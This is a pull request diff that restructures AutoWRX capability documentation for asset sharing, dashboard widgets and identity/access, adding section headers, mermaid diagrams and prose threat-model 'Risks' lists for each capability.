### PR TITLE
docs(capabilities): restructure catalog with header sections, risks, mermaid diagrams

### DIFF
--- a/docs/capabilities/README.md
+++ b/docs/capabilities/README.md
@@ -6,12 +6,14 @@ A code-grounded catalog of what AutoWRX does, organized into **clusters** of rel
 
 ## Capability sections (every capability has these)
 
+Each capability is an `## Capability` heading; the six sections below are `### Section` headers, each followed by a paragraph (or a bullet list under Acceptance criteria). Every cluster file also opens with a mermaid diagram of the cluster's overall flow, and capabilities include a per-capability mermaid diagram where a request flow or state transition is worth illustrating.
+
 - **Description** — what it is and does.
 - **Who uses it / who gets value** — the roles that use or benefit (end user, model owner, admin, DevOps/integrator, plugin author, …).
 - **Acceptance criteria** — how it works fully, how to verify it, and the acceptable behavior (incl. error/edge cases).
 - **Quality control** — how to test it (manual steps / API checks).
-- **Security** — auth, permissions, sandboxing, attack surface.
-- **Data protection** — what data is stored/sent, secrets, retention, privacy.
+- **Security** — auth, permissions, sandboxing, attack surface, followed by a **Risks:** bullet list stating concretely what could be lost or how the capability could be attacked.
+- **Data protection** — what data is stored/sent, secrets, retention, privacy, followed by a **Risks:** bullet list stating concretely the risk of losing user data or exposing it.
 
 ## Clusters
 

--- a/docs/capabilities/assets-sharing.md
+++ b/docs/capabilities/assets-sharing.md
@@ -2,76 +2,320 @@
 
 User-owned resources (cloud runtimes, hardware kits, GenAI configs) and the sharing/collaboration layer. Backend: `routes/v2/user-management/asset.route.js`, `models/asset.model.js`. Frontend: `pages/PageMyAssets.tsx`, `components/organisms/RuntimeAssetManager.tsx`, `components/molecules/ShareAssetPanel.tsx`.
 
+```mermaid
+flowchart TD
+    subgraph Assets
+        A["Create asset<br/>(CLOUD_RUNTIME · HARDWARE_KIT · GENAI-PYTHON)"] --> B["List / get / edit"]
+        B --> C["Delete"]
+        B --> S["Share with user<br/>(read_asset / write_asset)"]
+        B --> M["Admin: manage all"]
+    end
+    L["Email lookup"] -.->|resolve userId| S
+    I["AccessInvitation dialog"] -.->|UI for| S
+    S -->|binding| U[("assets + UserRole")]
+    B --> U
+    style U fill:#fef3c7
+```
+
 ---
 
 ## User assets CRUD
 
-- **Description:** Create/list/get/update/delete assets of types enabled by `USER_ASSET_TYPES` (default `CLOUD_RUNTIME`, `HARDWARE_KIT`, `GENAI-PYTHON`) with arbitrary `data`.
-- **Who uses it / value:** End users (manage their runtimes/kits/GenAI configs); admins (oversight).
-- **Acceptance criteria:**
-  - `GET /v2/assets` (auth) → `200` the user's assets (+ shared with them); `POST` (auth) → `200` create; `GET /v2/assets/:id` (auth + `READ_ASSET`) → `200`; `PATCH` (auth + `WRITE_ASSET`) → `200` (empty body); `DELETE` (auth + `WRITE_ASSET`) → `200`.
-  - Asset types restricted to `USER_ASSET_TYPES`.
-- **Quality control:** Create a `CLOUD_RUNTIME` asset → appears in My Assets; edit → persists; delete → gone; access another user's asset without sharing → `403`.
-- **Security:** All routes auth; get/update/delete gated by `READ_ASSET`/`WRITE_ASSET` permission on the asset; types gated by `USER_ASSET_TYPES`.
-- **Data protection:** Asset `data` (arbitrary config — endpoint URLs, tokens, kit identity) stored in `assets` with `created_by`.
+### Description
+
+Create/list/get/update/delete assets of types enabled by `USER_ASSET_TYPES` (default `CLOUD_RUNTIME`, `HARDWARE_KIT`, `GENAI-PYTHON`) with arbitrary `data`.
+
+### Who uses it / value
+
+End users (manage their runtimes/kits/GenAI configs); admins (oversight).
+
+### Acceptance criteria
+
+- `GET /v2/assets` (auth) → `200` the user's assets (+ shared with them); `POST` (auth) → `200` create; `GET /v2/assets/:id` (auth + `READ_ASSET`) → `200`; `PATCH` (auth + `WRITE_ASSET`) → `200` (empty body); `DELETE` (auth + `WRITE_ASSET`) → `200`.
+- Asset types restricted to `USER_ASSET_TYPES`.
+
+### Quality control
+
+Create a `CLOUD_RUNTIME` asset → appears in My Assets; edit → persists; delete → gone; access another user's asset without sharing → `403`.
+
+```mermaid
+flowchart LR
+    U([User]) -->|"POST /v2/assets"| C["Create (auth)"]
+    U -->|"GET /v2/assets"| L["List own + shared"]
+    U -->|"GET /v2/assets/:id"| G{READ_ASSET?}
+    G -->|no| N1["403"]
+    G -->|yes| D["200 asset"]
+    U -->|"PATCH / DELETE"| W{WRITE_ASSET?}
+    W -->|no| N2["403"]
+    W -->|yes| OK["200"]
+```
+
+### Security
+
+All routes auth; get/update/delete gated by `READ_ASSET`/`WRITE_ASSET` permission on the asset; types gated by `USER_ASSET_TYPES`.
+
+**Risks:**
+- **Cross-user asset access:** a missing `READ_ASSET`/`WRITE_ASSET` check would let any authenticated user read or modify another user's assets, exposing runtime configs, hardware-kit identity and GenAI tokens.
+- **Type bypass:** if the `USER_ASSET_TYPES` gate were skipped, users could create asset types outside the allowed set, introducing untrusted config shapes the frontend/backend aren't built to handle safely.
+- **Arbitrary `data` abuse:** because `data` is arbitrary, a missing type/size guard could let a user store oversized payloads, exhausting per-user storage.
+
+### Data protection
+
+Asset `data` (arbitrary config — endpoint URLs, tokens, kit identity) stored in `assets` with `created_by`.
+
+**Risks:**
+- **Secrets in cleartext:** `data` may hold GenAI auth tokens or runtime credentials; stored unencrypted at rest, a DB leak or admin-view exposure hands plaintext secrets to the attacker.
+- **Irreversible delete:** assets are hard-removed (no soft-delete), so accidental or malicious deletion permanently destroys the user's runtime/kit config.
 
 ## Admin all-assets view
 
-- **Description:** Admin view of all assets across users.
-- **Who uses it / value:** Admins (oversight/support).
-- **Acceptance criteria:**
-  - `GET /v2/assets/manage` (auth + `MANAGE_USERS`) → `200` all assets.
-- **Quality control:** As admin → see all assets; as non-admin → `403`.
-- **Security:** `MANAGE_USERS` required.
-- **Data protection:** Exposes all asset records to admins (incl. `data` which may hold tokens — admin-only).
+### Description
+
+Admin view of all assets across users.
+
+### Who uses it / value
+
+Admins (oversight/support).
+
+### Acceptance criteria
+
+- `GET /v2/assets/manage` (auth + `MANAGE_USERS`) → `200` all assets.
+
+### Quality control
+
+As admin → see all assets; as non-admin → `403`.
+
+### Security
+
+`MANAGE_USERS` required.
+
+**Risks:**
+- **Privilege abuse:** an admin (or anyone who obtains `MANAGE_USERS`) can read every user's assets, including GenAI tokens and runtime credentials — a single compromised admin drains all users' secrets.
+- **Missing gate:** if the `MANAGE_USERS` check regressed, the manage endpoint would become a full cross-user data exfiltration path for any authenticated user.
+
+### Data protection
+
+Exposes all asset records to admins (incl. `data` which may hold tokens — admin-only).
+
+**Risks:**
+- **Bulk secret exposure:** one endpoint returns all users' `data` at once; a leak of an admin session token exposes every user's credentials simultaneously with no per-record gate.
 
 ## My Assets
 
-- **Description:** UI page to manage the current user's assets; the `GENAI-PYTHON` asset editor configures a GenAI endpoint (method/URL/token/request/response fields).
-- **Who uses it / value:** End users (manage assets); GenAI integrators (configure endpoints).
-- **Acceptance criteria:**
-  - Route `/my-assets` (auth) lists the user's assets; create/edit/delete/share; `GENAI-PYTHON` editor captures endpoint config.
-- **Quality control:** Open `/my-assets` → your assets listed; configure a GenAI asset → its endpoint used by GenAI flows.
-- **Security:** Auth required.
-- **Data protection:** `GENAI-PYTHON` asset `data` may hold an auth token — stored in asset `data` (not encrypted at rest; access `READ_ASSET`/`WRITE_ASSET` gated).
+### Description
+
+UI page to manage the current user's assets; the `GENAI-PYTHON` asset editor configures a GenAI endpoint (method/URL/token/request/response fields).
+
+### Who uses it / value
+
+End users (manage assets); GenAI integrators (configure endpoints).
+
+### Acceptance criteria
+
+- Route `/my-assets` (auth) lists the user's assets; create/edit/delete/share; `GENAI-PYTHON` editor captures endpoint config.
+
+### Quality control
+
+Open `/my-assets` → your assets listed; configure a GenAI asset → its endpoint used by GenAI flows.
+
+```mermaid
+flowchart TD
+    U([User]) -->|"/my-assets"| P["PageMyAssets"]
+    P --> M["RuntimeAssetManager"]
+    M --> G["GENAI-PYTHON editor"]
+    G --> D["data: method / URL / token / fields"]
+    M --> S["ShareAssetPanel"]
+```
+
+### Security
+
+Auth required.
+
+**Risks:**
+- **Token in browser memory:** the GenAI editor loads and submits auth tokens through the client; a malicious browser extension or XSS on the page can read the token from the form state.
+
+### Data protection
+
+`GENAI-PYTHON` asset `data` may hold an auth token — stored in asset `data` (not encrypted at rest; access `READ_ASSET`/`WRITE_ASSET` gated).
+
+**Risks:**
+- **Cleartext token at rest:** the GenAI token sits unencrypted in the asset `data`; any path that reads the asset (admin view, a leaked `READ_ASSET` grant, DB backup) exposes it.
 
 ## Asset sharing
 
-- **Description:** Share an asset with users (by email lookup) with read/write roles; remove access.
-- **Who uses it / value:** Asset owners (delegate runtime/kit access); collaborators (gain access).
-- **Acceptance criteria:**
-  - `POST /v2/assets/:id/permissions {userId, role}` (auth + `WRITE_ASSET`) → `201` (role enum `read_asset`/`write_asset`); `DELETE /v2/assets/:id/permissions?userId=&role=` (auth + `WRITE_ASSET`) → `204`.
-  - Shared users see the asset in their list.
-- **Quality control:** Share with a user (by email) → they see the asset and can use it (read_asset) / modify (write_asset); remove → access revoked.
-- **Security:** Both ops require `WRITE_ASSET` on the asset. Roles are `read_asset`/`write_asset`.
-- **Data protection:** Creates/removes authorized-user bindings on the asset; no secrets duplicated.
+### Description
+
+Share an asset with users (by email lookup) with read/write roles; remove access.
+
+### Who uses it / value
+
+Asset owners (delegate runtime/kit access); collaborators (gain access).
+
+### Acceptance criteria
+
+- `POST /v2/assets/:id/permissions {userId, role}` (auth + `WRITE_ASSET`) → `201` (role enum `read_asset`/`write_asset`); `DELETE /v2/assets/:id/permissions?userId=&role=` (auth + `WRITE_ASSET`) → `204`.
+- Shared users see the asset in their list.
+
+### Quality control
+
+Share with a user (by email) → they see the asset and can use it (read_asset) / modify (write_asset); remove → access revoked.
+
+```mermaid
+sequenceDiagram
+    participant U as Owner
+    participant API as /v2/assets/:id/permissions
+    participant DB as UserRole binding
+    U->>API: POST {userId, role}
+    API->>API: check WRITE_ASSET
+    API->>DB: create binding (asset ref)
+    API-->>U: 201
+    Note over DB: asset appears in shared user's list
+    U->>API: DELETE ?userId=&role=
+    API->>DB: remove binding
+    API-->>U: 204
+```
+
+### Security
+
+Both ops require `WRITE_ASSET` on the asset. Roles are `read_asset`/`write_asset`.
+
+**Risks:**
+- **Privilege escalation:** a missing `WRITE_ASSET` check would let any user grant themselves or others `write_asset` on private assets — escalation to read/modify the owner's runtime configs and tokens.
+- **Over-grant persistence:** a `write_asset` grant survives until manually revoked; a leaked or malicious grant keeps an attacker inside the asset with no auto-expiry.
+
+### Data protection
+
+Creates/removes authorized-user bindings on the asset; no secrets duplicated.
+
+**Risks:**
+- **Relationship leak:** asset-sharing bindings reveal who collaborates on which runtime/kit (users ↔ business assets), exposing business relationships.
 
 ## Model contributors
 
-- **Description:** Add/remove contributors on a model; contributors see the model under "My Contributions" and gain edit access (with `writeModel`).
-- **Who uses it / value:** Model owners (delegate); contributors (gain access).
-- **Acceptance criteria:**
-  - `POST /v2/models/:id/permissions` (requires `WRITE_MODEL`) → `201`; `DELETE /v2/models/:id/permissions?userId=&role=` (requires `WRITE_MODEL`) → `204`.
-- **Quality control:** Add a contributor → model appears in their "My Contributions"; remove → gone.
-- **Security:** Requires `WRITE_MODEL` on the model.
-- **Data protection:** UserRole bindings scoped to the model.
+### Description
+
+Add/remove contributors on a model; contributors see the model under "My Contributions" and gain edit access (with `writeModel`).
+
+### Who uses it / value
+
+Model owners (delegate); contributors (gain access).
+
+### Acceptance criteria
+
+- `POST /v2/models/:id/permissions` (requires `WRITE_MODEL`) → `201`; `DELETE /v2/models/:id/permissions?userId=&role=` (requires `WRITE_MODEL`) → `204`.
+
+### Quality control
+
+Add a contributor → model appears in their "My Contributions"; remove → gone.
+
+```mermaid
+sequenceDiagram
+    participant U as Owner
+    participant API as /v2/models/:id/permissions
+    participant DB as UserRole binding
+    U->>API: POST
+    API->>API: check WRITE_MODEL
+    API->>DB: create binding (model ref)
+    API-->>U: 201
+    U->>API: DELETE ?userId=&role=
+    API->>DB: remove binding
+    API-->>U: 204
+```
+
+### Security
+
+Requires `WRITE_MODEL` on the model.
+
+**Risks:**
+- **Privilege escalation:** a missing `WRITE_MODEL` check would let any user add themselves as a contributor to private models, gaining edit access to model data and prototype code.
+
+### Data protection
+
+UserRole bindings scoped to the model.
+
+**Risks:**
+- **Relationship leak:** contributor bindings reveal who collaborates on which model (users ↔ business assets).
+- **Mis-grant persistence:** a leaked grant persists until manually revoked; with no audit trail of permission changes, mis-grants are hard to detect after the fact.
 
 ## Access invitation
 
-- **Description:** Reusable dialog to invite users to an object with selectable access levels; remove user access.
-- **Who uses it / value:** Object owners (invite collaborators).
-- **Acceptance criteria:**
-  - `AccessInvitation` dialog used by model/asset sharing flows; pick access level; remove a user's access.
-- **Quality control:** Invite a user by email with an access level → they gain that access; remove → revoked.
-- **Security:** Invoker must be the object owner / authorized.
-- **Data protection:** Driven by the underlying permission endpoints (no separate data store).
+### Description
+
+Reusable dialog to invite users to an object with selectable access levels; remove user access.
+
+### Who uses it / value
+
+Object owners (invite collaborators).
+
+### Acceptance criteria
+
+- `AccessInvitation` dialog used by model/asset sharing flows; pick access level; remove a user's access.
+
+### Quality control
+
+Invite a user by email with an access level → they gain that access; remove → revoked.
+
+```mermaid
+flowchart LR
+    O([Object owner]) -->|email| D["AccessInvitation dialog"]
+    D -->|pick level| L["read / write"]
+    D -->|"remove"| R["revoke access"]
+    L -->|"POST /permissions"| API["asset / model permission API"]
+    R -->|"DELETE /permissions"| API
+```
+
+### Security
+
+Invoker must be the object owner / authorized.
+
+**Risks:**
+- **Client-side auth bypass:** the dialog is UI only; the real gate is the underlying permission endpoint. If a frontend-only check were trusted, a user could call the permission API directly to grant themselves access.
+
+### Data protection
+
+Driven by the underlying permission endpoints (no separate data store).
+
+**Risks:**
+- **No independent data store:** because the dialog owns no state, all data-protection risk is inherited from the asset/model permission endpoints — a regression there surfaces directly through this UI.
 
 ## User lookup by email
 
-- **Description:** Find a user by exact email (id/name/image) for sharing/collaborator flows.
-- **Who uses it / value:** Anyone sharing (find recipients).
-- **Acceptance criteria:**
-  - `GET /v2/search/email/:email` (optional auth via `PUBLIC_VIEWING`) → `200` user or `404` if not found.
-- **Quality control:** Search an existing email → returns the user; a non-existent email → `404`.
-- **Security:** Optional auth via `PUBLIC_VIEWING`; returns minimal fields (id/name/image) — no email exposure beyond the queried one.
-- **Data protection:** Returns minimal profile fields; not an enumeration endpoint (exact email required).
+### Description
+
+Find a user by exact email (id/name/image) for sharing/collaborator flows.
+
+### Who uses it / value
+
+Anyone sharing (find recipients).
+
+### Acceptance criteria
+
+- `GET /v2/search/email/:email` (optional auth via `PUBLIC_VIEWING`) → `200` user or `404` if not found.
+
+### Quality control
+
+Search an existing email → returns the user; a non-existent email → `404`.
+
+```mermaid
+flowchart LR
+    U([Caller]) -->|"GET /v2/search/email/:email"| L{PUBLIC_VIEWING?}
+    L -->|false + anon| N1["401"]
+    L -->|true/authed| Q["exact email match"]
+    Q -->|found| OK["200 {id,name,image}"]
+    Q -->|not found| N2["404"]
+```
+
+### Security
+
+Optional auth via `PUBLIC_VIEWING`; returns minimal fields (id/name/image) — no email exposure beyond the queried one.
+
+**Risks:**
+- **Email enumeration:** exact-email lookup with `404` vs `200` lets an attacker confirm whether a given email is registered, enabling account enumeration for downstream phishing.
+- **Recipient discovery:** with `PUBLIC_VIEWING=true`, an unauthenticated attacker can resolve any user's id/name/image from their email, seeding targeted abuse of sharing flows.
+
+### Data protection
+
+Returns minimal profile fields; not an enumeration endpoint (exact email required).
+
+**Risks:**
+- **Profile leakage:** returning id/name/image for arbitrary emails reveals user identities to anyone with `PUBLIC_VIEWING`, even though the endpoint avoids echoing the email itself.

--- a/docs/capabilities/dashboards-widgets.md
+++ b/docs/capabilities/dashboards-widgets.md
@@ -2,67 +2,267 @@
 
 Visual run-time dashboards of widget iframes fed runtime signal values. Frontend: `components/molecules/dashboard/`. Backend: builtin-widget static hosting + dashboard template routes.
 
+```mermaid
+flowchart TD
+    subgraph Authoring
+        E["Dashboard editor<br/>(5×2 grid)"] --> WC["prototype.widget_config"]
+        E -->|add from| S["Widget sources<br/>(Built-in · Marketplace · URL)"]
+        S --> BI["data/builtinWidgets.ts"]
+        S --> MK["DEFAULT_MARKETPLACE_URL"]
+        S --> URL["Direct URL"]
+        E -->|auto-applies| DT["Dashboard templates<br/>(default)"]
+    end
+    subgraph Runtime
+        R["Dashboard renderer"] -->|renders| IF["Widget iframes"]
+        RS["runtimeStore"] -->|postMessage / runtime values| IF
+        R -->|run/stop events| IF
+    end
+    WC --> R
+    BI -->|static| H["GET /builtin-widgets/..."]
+    style WC fill:#fef3c7
+    style DT fill:#fef3c7
+```
+
 ---
 
 ## Dashboard renderer
 
-- **Description:** Renders a prototype's widget dashboard: widget iframes fed runtime signal values from the connected runtime; supports fullscreen mode and notifies widget iframes of run/stop.
-- **Who uses it / value:** End users (visualize prototype behavior); demo audiences.
-- **Acceptance criteria:**
-  - Renders `widget_config` widgets; signals flow from `runtimeStore` to widget iframes via postMessage/runtime values; run/stop events broadcast to widgets.
-  - Fullscreen toolbar (logo + branding from site config).
-- **Quality control:** Run a prototype with a dashboard → widgets render and update as signals change; toggle fullscreen → immersive view; stop → widgets reflect stopped state.
-- **Security:** Read `READ_MODEL`. Widgets are third-party iframes — same-origin policy depends on the widget URL.
-- **Data protection:** `widget_config` (widget definitions/options) stored in `prototype.widget_config`; signal values are runtime/transient.
+### Description
+
+Renders a prototype's widget dashboard: widget iframes fed runtime signal values from the connected runtime; supports fullscreen mode and notifies widget iframes of run/stop.
+
+### Who uses it / value
+
+End users (visualize prototype behavior); demo audiences.
+
+### Acceptance criteria
+
+- Renders `widget_config` widgets; signals flow from `runtimeStore` to widget iframes via postMessage/runtime values; run/stop events broadcast to widgets.
+- Fullscreen toolbar (logo + branding from site config).
+
+### Quality control
+
+Run a prototype with a dashboard → widgets render and update as signals change; toggle fullscreen → immersive view; stop → widgets reflect stopped state.
+
+```mermaid
+sequenceDiagram
+    participant RT as runtimeStore
+    participant R as Dashboard renderer
+    participant IF as Widget iframe
+    RT->>R: runtime signal values
+    R->>IF: postMessage (signal values)
+    R->>IF: run/stop event broadcast
+    IF-->>R: widget renders / updates
+```
+
+### Security
+
+Read `READ_MODEL`. Widgets are third-party iframes — same-origin policy depends on the widget URL.
+
+**Risks:**
+- **Untrusted iframe content:** widgets are third-party iframes rendered into the dashboard; a malicious or compromised widget URL can run arbitrary script in a victim's browser (XSS, token theft) whenever the dashboard is opened.
+- **postMessage leakage:** runtime signal values are broadcast to all widget iframes on the dashboard; a hostile widget receives every signal the prototype emits, even values it was not meant to see.
+
+### Data protection
+
+`widget_config` (widget definitions/options) stored in `prototype.widget_config`; signal values are runtime/transient.
+
+**Risks:**
+- **Cross-widget signal exposure:** because signals are broadcast to every iframe, a single untrusted widget can exfiltrate the prototype's full runtime signal stream to a remote endpoint.
+- **Config tampering:** `widget_config` is mutable via the editor; a tampered config can point every widget at an attacker-controlled URL, persisting the leak across dashboard opens.
 
 ## Dashboard editor
 
-- **Description:** Visual 5×2 grid editor: place/move/edit/delete widgets; add from Built-in / Marketplace / by URL; edit options (JSON), boxes, URL/path; "used signals" helper; open in Web Studio; auto-applies the default dashboard template.
-- **Who uses it / value:** Prototype authors (compose dashboards).
-- **Acceptance criteria:**
-  - Edit requires `READ_MODEL`; auto-applies the default dashboard template on first open.
-  - Add widget from Built-in / Marketplace / URL; edit options/boxes; move/delete on the grid; "Save as Template" requires admin.
-- **Quality control:** Add a builtin widget → renders on the grid; edit options → widget reflects them; save-as-template (admin) → appears in dashboard templates.
-- **Security:** Edit `READ_MODEL`; save-as-template admin. Marketplace widgets from `DEFAULT_MARKETPLACE_URL` (third-party).
-- **Data protection:** Widget config (URLs/options) stored in `prototype.widget_config`; options may reference runtime signals.
+### Description
+
+Visual 5×2 grid editor: place/move/edit/delete widgets; add from Built-in / Marketplace / by URL; edit options (JSON), boxes, URL/path; "used signals" helper; open in Web Studio; auto-applies the default dashboard template.
+
+### Who uses it / value
+
+Prototype authors (compose dashboards).
+
+### Acceptance criteria
+
+- Edit requires `READ_MODEL`; auto-applies the default dashboard template on first open.
+- Add widget from Built-in / Marketplace / URL; edit options/boxes; move/delete on the grid; "Save as Template" requires admin.
+
+### Quality control
+
+Add a builtin widget → renders on the grid; edit options → widget reflects them; save-as-template (admin) → appears in dashboard templates.
+
+```mermaid
+flowchart LR
+    U([Author]) -->|"READ_MODEL"| E["Dashboard editor (5×2 grid)"]
+    E -->|add| S["Built-in / Marketplace / URL"]
+    E -->|edit options/boxes| WC["prototype.widget_config"]
+    E -->|"Save as Template (admin)"| DT["Dashboard templates"]
+    E -.->|auto-applies on first open| DT
+```
+
+### Security
+
+Edit `READ_MODEL`; save-as-template admin. Marketplace widgets from `DEFAULT_MARKETPLACE_URL` (third-party).
+
+**Risks:**
+- **Config injection via editor:** a `READ_MODEL`-only gate lets any authorized contributor embed arbitrary widget URLs/options into the dashboard; viewers who open that dashboard then run those widgets, turning a low-privilege contributor into an XSS vector.
+- **Marketplace supply chain:** Marketplace widgets are pulled from `DEFAULT_MARKETPLACE_URL`; a compromised marketplace entry becomes an attack surface for every author who adds it.
+- **Save-as-template escalation:** if the admin-only gate on "Save as Template" were bypassed, a non-admin could publish a malicious dashboard as a default applied to all new dashboards.
+
+### Data protection
+
+Widget config (URLs/options) stored in `prototype.widget_config`; options may reference runtime signals.
+
+**Risks:**
+- **Persistent widget-config tampering:** a malicious `widget_config` (URLs/options) is persisted on the prototype and re-rendered for every viewer until manually fixed, repeatedly steering users toward untrusted widgets.
+- **Signal-reference leakage:** options that reference runtime signals encode which signals the prototype exposes; a tampered config can be crafted to surface and exfiltrate sensitive signals.
 
 ## Widget sources (Built-in / Marketplace / URL)
 
-- **Description:** Three sources to add widgets: Built-in library (`data/builtinWidgets.ts`), Marketplace (`useListMarketplaceWidgets` from `DEFAULT_MARKETPLACE_URL`), and by direct URL.
-- **Who uses it / value:** Authors (pick widgets); marketplace providers (distribute widgets).
-- **Acceptance criteria:**
-  - Built-in widgets render from `data/builtinWidgets.ts`; marketplace widgets fetched from `DEFAULT_MARKETPLACE_URL`; URL widgets load from the given URL.
-- **Quality control:** Add a builtin widget → renders; browse marketplace → list loads (if URL configured); add by URL → loads.
-- **Security:** Marketplace/URL widgets are remote third-party content — render in iframes; verify URLs are trusted.
-- **Data protection:** No PII; widget URLs/options stored in widget config.
+### Description
+
+Three sources to add widgets: Built-in library (`data/builtinWidgets.ts`), Marketplace (`useListMarketplaceWidgets` from `DEFAULT_MARKETPLACE_URL`), and by direct URL.
+
+### Who uses it / value
+
+Authors (pick widgets); marketplace providers (distribute widgets).
+
+### Acceptance criteria
+
+- Built-in widgets render from `data/builtinWidgets.ts`; marketplace widgets fetched from `DEFAULT_MARKETPLACE_URL`; URL widgets load from the given URL.
+
+### Quality control
+
+Add a builtin widget → renders; browse marketplace → list loads (if URL configured); add by URL → loads.
+
+```mermaid
+flowchart TD
+    E([Editor add-tab]) --> B["Built-in<br/>(data/builtinWidgets.ts)"]
+    E --> M["Marketplace<br/>(useListMarketplaceWidgets)"]
+    E --> U["By URL"]
+    M -->|fetch| MK["DEFAULT_MARKETPLACE_URL"]
+    B --> WC["widget_config"]
+    M --> WC
+    U --> WC
+```
+
+### Security
+
+Marketplace/URL widgets are remote third-party content — render in iframes; verify URLs are trusted.
+
+**Risks:**
+- **Arbitrary remote widget URL:** the "by URL" source lets an author embed any remote page as a widget; there is no allowlist, so any signed-in author can pivot a dashboard into a launcher for attacker-hosted content.
+- **Marketplace trust boundary:** widgets listed by `DEFAULT_MARKETPLACE_URL` are not vetted by this platform; a malicious marketplace listing is presented to authors as if it were trusted.
+- **Mixed-content / origin bypass:** URL widgets loaded over plain HTTP or from untrusted origins bypass the same-origin protections assumed for builtin widgets.
+
+### Data protection
+
+No PII; widget URLs/options stored in widget config.
+
+**Risks:**
+- **URL persistence as exfil channel:** widget URLs are persisted in `widget_config`; a URL pointing to an attacker endpoint can receive (via postMessage or query params) runtime data every time the dashboard renders.
 
 ## Builtin widgets hosting
 
-- **Description:** Prebuilt widget bundles (3d-car, chart-signals, image-by-api-value, signal-list-settable with vss.json, simple-fan, simple-wiper, single-api, terminal) plus shared libs (chart.min.js, tailwind/font-awesome, syncer.js), served from `/builtin-widgets`.
-- **Who uses it / value:** Authors (ready-made widgets); end users (visualizations).
-- **Acceptance criteria:**
-  - Static `GET /builtin-widgets/...` serves the bundles; the editor's Built-in tab lists them.
-- **Quality control:** Request a builtin widget asset → served with correct MIME; add one to a dashboard → renders.
-- **Security:** Public static; no auth.
-- **Data protection:** Static assets only.
+### Description
+
+Prebuilt widget bundles (3d-car, chart-signals, image-by-api-value, signal-list-settable with vss.json, simple-fan, simple-wiper, single-api, terminal) plus shared libs (chart.min.js, tailwind/font-awesome, syncer.js), served from `/builtin-widgets`.
+
+### Who uses it / value
+
+Authors (ready-made widgets); end users (visualizations).
+
+### Acceptance criteria
+
+- Static `GET /builtin-widgets/...` serves the bundles; the editor's Built-in tab lists them.
+
+### Quality control
+
+Request a builtin widget asset → served with correct MIME; add one to a dashboard → renders.
+
+### Security
+
+Public static; no auth.
+
+**Risks:**
+- **Path traversal on static root:** if `/builtin-widgets/...` is not strictly path-normalized, an attacker could request `../` sequences to read files outside the widget bundles (config, source) from the server.
+- **Unauthed asset enumeration:** public unauthenticated serving lets anyone enumerate and fingerprint the platform's widget versions and shared libraries for targeted exploits.
+
+### Data protection
+
+Static assets only.
+
+**Risks:**
+- **Bundled data exposure:** some bundles embed data such as `vss.json`; if a bundle accidentally includes prototype or tenant data, public unauthed serving would leak it to anyone.
 
 ## Dashboard templates
 
-- **Description:** Named `widget_config` presets with a single `is_default` template and public/private visibility; admin CRUD.
-- **Who uses it / value:** Admins (standardize dashboards); authors (quick-start).
-- **Acceptance criteria:**
-  - `GET /v2/dashboard-template[/:id]` (public) → list/get; `POST` → `201` (admin); `PUT/DELETE /:id` → `200`/`204` (admin). Also at `/v2/system/dashboard-template`.
-  - The default template auto-applies on dashboard open.
-- **Quality control:** Admin creates a template → appears in the manager; it auto-applies on new dashboards.
-- **Security:** Read public; write `MANAGE_USERS`.
-- **Data protection:** Template `widget_config` stored; no secrets.
+### Description
+
+Named `widget_config` presets with a single `is_default` template and public/private visibility; admin CRUD.
+
+### Who uses it / value
+
+Admins (standardize dashboards); authors (quick-start).
+
+### Acceptance criteria
+
+- `GET /v2/dashboard-template[/:id]` (public) → list/get; `POST` → `201` (admin); `PUT/DELETE /:id` → `200`/`204` (admin). Also at `/v2/system/dashboard-template`.
+- The default template auto-applies on dashboard open.
+
+### Quality control
+
+Admin creates a template → appears in the manager; it auto-applies on new dashboards.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|"POST/PUT/DELETE (MANAGE_USERS)"| T["dashboard-template (is_default)"]
+    E([Dashboard editor]) -.->|auto-applies default on open| T
+    T -.->|layout applied| WC["prototype.widget_config"]
+```
+
+### Security
+
+Read public; write `MANAGE_USERS`.
+
+**Risks:**
+- **Platform-wide payload:** templates auto-apply to dashboards on first open. A compromised admin could seed a `is_default` template embedding a malicious widget URL, pushing untrusted content to every new dashboard.
+- **Visibility misconfiguration:** a template's public/private visibility controls who can use it; a wrong default could expose a private template's widget layout to all authors.
+
+### Data protection
+
+Template `widget_config` stored; no secrets.
+
+**Risks:**
+- **Persistent distribution channel:** a malicious template propagates its widget URLs/options to all dashboards derived from it until an admin notices and removes it, repeatedly exposing users to untrusted widget content.
 
 ## Widget ProtoPilot (GenAI widgets) — roadmap
 
-- **Description:** GenAI-based widget generation from a prompt.
-- **Who uses it / value:** Authors (generate widgets without coding).
-- **Acceptance criteria:**
-  - Currently a placeholder ("coming soon") in the widget library UI — not implemented.
-- **Quality control:** N/A (not functional).
-- **Security:** N/A.
-- **Data protection:** N/A.
+### Description
+
+GenAI-based widget generation from a prompt.
+
+### Who uses it / value
+
+Authors (generate widgets without coding).
+
+### Acceptance criteria
+
+- Currently a placeholder ("coming soon") in the widget library UI — not implemented.
+
+### Quality control
+
+N/A (not functional).
+
+### Security
+
+N/A.
+
+**Risks:**
+- **Future generated-code execution:** once implemented, GenAI-generated widgets would run as third-party iframes; without sandboxing/output validation, prompt-injection could yield widgets that exfiltrate runtime signals.
+
+### Data protection
+
+N/A.
+
+**Risks:**
+- **Prompt-derived widget content:** when implemented, generated widget code persisted in `widget_config` could embed sensitive signal references the author did not intend to expose.

--- a/docs/capabilities/identity-access.md
+++ b/docs/capabilities/identity-access.md
@@ -2,112 +2,497 @@
 
 Authentication, identity, and authorization. Backend: `routes/v2/user-management/`, `services/auth.service.js`, `services/token.service.js`, `config/passport.js`, `config/roles.js`. Frontend: `stores/authStore.ts`, `hooks/usePermissionHook.ts`.
 
+```mermaid
+flowchart TD
+    subgraph AuthN[Authentication]
+        L["Login / register / refresh"] --> AT["Access token (memory)"]
+        L --> RC["Refresh cookie (httpOnly)"]
+        SSO["SSO (OIDC / GitHub)"] --> AT
+        SSO --> RC
+        PR["Password reset / verify"] --> L
+    end
+    subgraph AuthZ[Authorization]
+        RBAC1["RBAC v1<br/>checkPermission · usePermissionHook"]
+        RBAC2["Casbin RBAC v2<br/>/authorize (partial)"]
+        RBAC1 -->|owner bypass| OWN["resource owner"]
+        RBAC1 -->|ref-scoped| UR["UserRole (user, role, ref)"]
+    end
+    AT -->|bearer| RBAC1
+    AT -->|bearer| RBAC2
+    UM["User management (admin)"] -->|MANAGE_USERS| UR
+    UM --> U[("users collection")]
+    subgraph Flags[Site auth flags]
+        F1["SELF_REGISTRATION"]
+        F2["PUBLIC_VIEWING"]
+        F3["PASSWORD_MANAGEMENT"]
+        F4["SSO_AUTO_REGISTRATION"]
+        F5["SSO_PROVIDERS"]
+    end
